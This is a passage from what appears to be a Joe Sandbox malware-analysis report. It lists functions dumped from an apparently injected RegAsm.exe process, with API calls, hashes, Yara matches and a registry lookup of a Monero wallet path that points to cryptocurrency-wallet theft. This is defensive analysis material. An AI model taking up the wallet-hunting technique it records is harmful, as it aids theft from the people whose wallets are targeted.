                                                                                                                                                                                                • Opcode Fuzzy Hash: b5e458bbd876f3b70d02ec80c078dd4daf08301cacabd59262e3263f66b59eb0
                                                                                                                                                                                                • Instruction Fuzzy Hash: A321B4716006069ACB18DF61D9C1EFBB7A8FF14314B10453FE026D69D1DBB8E9C5CA54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B52CFE0 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
                                                                                                                                                                                                • Instruction ID: fd2e0fa15a989031b85952d0dfca4ae17a7f2d176283a4f11793c944d486d4a0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D21D075500709DFDB60EF68D881A9ABBF0EF98300F90486DF985C3261E331E6588B82
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B68F4CA Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 1B68F4E0
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 1B68F4ED
                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 1B68F513
                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 1B68F539
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FilePointer$ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 142388799-0
                                                                                                                                                                                                • Opcode ID: 382fb22a15595f61ae169e6bd40fe7be63330111959c8a6c848d8e833624ca72
                                                                                                                                                                                                • Instruction ID: 35c3d362204ef9e138a5cf71e064b819e185a774c3c63a60093e3cc618c457f2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 382fb22a15595f61ae169e6bd40fe7be63330111959c8a6c848d8e833624ca72
                                                                                                                                                                                                • Instruction Fuzzy Hash: B41148B1804229ABDF10AF55CC489DE3F79EB64760F104549FA24921A0D731D654CBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00418079 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3016257755-0
                                                                                                                                                                                                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                • Instruction ID: 42ebf01d859ded868fec211d77c9db086a1b69b70d0f693d6ae813612e605a66
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C114E7600414EFBCF225E85CC418EE3F72BB1C354B59845AFA2859131DB3AC9B6AB85
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040EA8B Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcatlstrcpylstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 809291720-0
                                                                                                                                                                                                • Opcode ID: e68b64505f589a4200435087e4e25978a8960ef6760191fbf086a80c38054505
                                                                                                                                                                                                • Instruction ID: 8defee5c3ee0f53a310ee246c3af5318aeafe1f7e3d011a29654af68e96018c8
                                                                                                                                                                                                • Opcode Fuzzy Hash: e68b64505f589a4200435087e4e25978a8960ef6760191fbf086a80c38054505
                                                                                                                                                                                                • Instruction Fuzzy Hash: C2015AB6900215EFDB209F9AD88459AFBB5FF48314B10883EF59AE3211C7B49990CF54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00401000 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3676486918-0
                                                                                                                                                                                                • Opcode ID: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                                                                                                                                • Instruction ID: 832c21bd40a73018163515ce5beef45c93da2aa0da3d8997035a91abaf75a422
                                                                                                                                                                                                • Opcode Fuzzy Hash: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                                                                                                                                • Instruction Fuzzy Hash: E2F03A79240208FFEB119F91DC0AFAE7B7AEB45B40F104025FB01AA1A0D7B19A109B24
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040EC27 Relevance: 6.0, APIs: 4, Instructions: 33memorytimeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042548E), ref: 0040EC35
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042548E), ref: 0040EC3C
                                                                                                                                                                                                • GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042548E), ref: 0040EC48
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040EC73
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1243822799-0
                                                                                                                                                                                                • Opcode ID: d4aeb748054ef85310db5bbdc432010fa75f15f3d3fe455483fb2aece36d3219
                                                                                                                                                                                                • Instruction ID: 6a3b0a9d5a99a23c7b872276523f8019a9300f8a2912452fb95d56cdfabf1196
                                                                                                                                                                                                • Opcode Fuzzy Hash: d4aeb748054ef85310db5bbdc432010fa75f15f3d3fe455483fb2aece36d3219
                                                                                                                                                                                                • Instruction Fuzzy Hash: F7F0FEAA900124BBDB50ABD99D09ABF76FDEF0DB02F001452FB41E1091E6788950D7B4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B492ABD Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 1B691382
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1B69138E
                                                                                                                                                                                                • ___initconout.LIBCMT ref: 1B69139E
                                                                                                                                                                                                  • Part of subcall function 1B691303: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1B6913A3), ref: 1B691316
                                                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 1B6913B3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3431868840-0
                                                                                                                                                                                                • Opcode ID: 8920e00c598d0a223442d0021cde6f1386a6e4c1f82e25f5df3321dddffe2b41
                                                                                                                                                                                                • Instruction ID: a696fd9af5c59bdb605b38fb495aaeab4bd5162fc41b4b13224ea3c6008866ac
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8920e00c598d0a223442d0021cde6f1386a6e4c1f82e25f5df3321dddffe2b41
                                                                                                                                                                                                • Instruction Fuzzy Hash: 60F08C36544569FFCF121FA6DC499DE3F7AFBA82A0F144028FE5885120CA32C8649B84
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4ABE80 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 314COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: string or blob too big
                                                                                                                                                                                                • API String ID: 0-2803948771
                                                                                                                                                                                                • Opcode ID: 3c7403777f3c15702796874d3bd02766c50516db33b59d12b0cfc9a730229abb
                                                                                                                                                                                                • Instruction ID: 7f46c9b4d79cd3b0ad3fd118681c5c9570a0f633bfb83f2c05ab899edc632bce
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c7403777f3c15702796874d3bd02766c50516db33b59d12b0cfc9a730229abb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CA12875A087868FD7048E788C407E6BBD1AFA9224F198B1DF4E3973D2E760D485CB85
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B617300 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %!.15g$-
                                                                                                                                                                                                • API String ID: 0-583212262
                                                                                                                                                                                                • Opcode ID: 07a97ff848006e3dab731f84862afccc668262358852586e1223e179cb07614c
                                                                                                                                                                                                • Instruction ID: d56c6178534d7344d310f4719e8751e82afc014e203b54bf270e72b39646816c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 07a97ff848006e3dab731f84862afccc668262358852586e1223e179cb07614c
                                                                                                                                                                                                • Instruction Fuzzy Hash: ED918DB1A083458FD704DF6DD89179AFBE0EBC8304F04492DE899CB351E7B9D8098B92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4DCBF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: string or blob too big
                                                                                                                                                                                                • API String ID: 0-2803948771
                                                                                                                                                                                                • Opcode ID: dc4f09d26705e071738a0829ca8d4ea090714c049dac605c26c6345461a354d0
                                                                                                                                                                                                • Instruction ID: 7506c984e18aec44e0128c00119d35c13f88dfca1b01f69e426a11c02c983b46
                                                                                                                                                                                                • Opcode Fuzzy Hash: dc4f09d26705e071738a0829ca8d4ea090714c049dac605c26c6345461a354d0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D8112B5A043019BDB00CF18CC61BD6B7E5AFA8710F44891CFA8597393E375E9468B9A
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5B78F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
